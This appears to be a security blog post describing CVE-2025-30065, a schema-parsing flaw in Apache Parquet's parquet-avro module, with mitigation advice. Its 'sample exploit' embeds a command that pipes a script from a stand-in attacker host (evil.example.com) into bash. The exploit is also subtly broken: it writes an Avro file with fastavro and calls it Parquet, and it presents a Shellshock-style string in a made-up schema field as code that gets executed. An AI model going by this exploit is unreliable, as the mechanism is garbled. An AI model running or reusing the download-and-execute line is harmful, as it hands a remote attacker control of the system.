CVE-2025-30065 - Critical Vulnerability Discovered in Schema Parsing of parquet-avro Module in Apache Parquet

A new critical vulnerability, CVE-2025-30065, has been discovered in the schema parsing of the parquet-avro module of Apache Parquet, which affects version 1.15. and earlier releases. This vulnerability allows bad actors to execute arbitrary code on the targeted system. In this blog post, we'll go over the details of this vulnerability, demonstrate a sample exploit, and provide information on how to mitigate the risk.

Background

Apache Parquet is a columnar data storage format, popular for its space-efficient and fast storage capabilities when used in big data processing frameworks like Apache Spark, Apache Hive, and Apache Hadoop. The parquet-avro module is designed to facilitate the conversion between Apache Parquet and Apache Avro file formats.

Exploit Details

The vulnerability occurs due to the insecure handling of schema parsing in the parquet-avro module, specifically in the method responsible for parsing Avro schemas. An attacker with the ability to control the input Avro schema fed to this module can execute arbitrary code using carefully crafted malicious input.

Sample Exploit

Below is a code snippet demonstrating a simple proof-of-concept exploit for this vulnerability. This Python code creates a malformed Avro schema and writes it to a Parquet file:

from fastavro import writer
import pyarrow.parquet as pq

# Creating the malicious Avro schema
malicious_schema = {
  "type": "record",
  "name": "MaliciousSchema",
  "fields": [
    {"name": "malicious_field", "type": {
         "type": "string",
         "_inject_code": "() { :; }; /bin/bash -c 'curl https://evil.example.com/malicious_script.sh | bash'"}
    },
  ],
}

# Writing the Avro schema to a Parquet file
with open("malicious.parquet", "wb") as output:
  writer(output, malicious_schema, [])

When the malicious.parquet file is read by an application using the vulnerable parquet-avro module, the arbitrary code within _inject_code can be executed, resulting in the downloading and execution of the malicious_script.sh from the attacker-controlled server.

Mitigation

The Apache Parquet project has released version 1.15.1, which includes a fix for this issue. Users are advised to upgrade as soon as possible. The release notes for version 1.15.1 can be found here: https://www.apache.org/dyn/closer.lua/parquet/RELEASE_NOTES.md

In case deploying the upgrade is not possible immediately, users can implement the following workaround:

- Implement strict validation of Avro schemas in your application before processing them using the parquet-avro module. Ensure that only trusted users have access to the schema processing feature.

Additional References

- Apache Parquet Official Website
- parquet-avro GitHub Repository

Conclusion

This critical vulnerability, CVE-2025-30065, discovered in the schema parsing of the parquet-avro module of Apache Parquet, highlights the importance of rigorously ensuring secure coding and validation practices in software development. By upgrading to Apache Parquet 1.15.1 and implementing the recommended validations and access control measures, users can mitigate the risk of potential exploits.

Timeline

Published on: 04/01/2025 08:15:15 UTC
Last modified on: 04/07/2025 03:15:21 UTC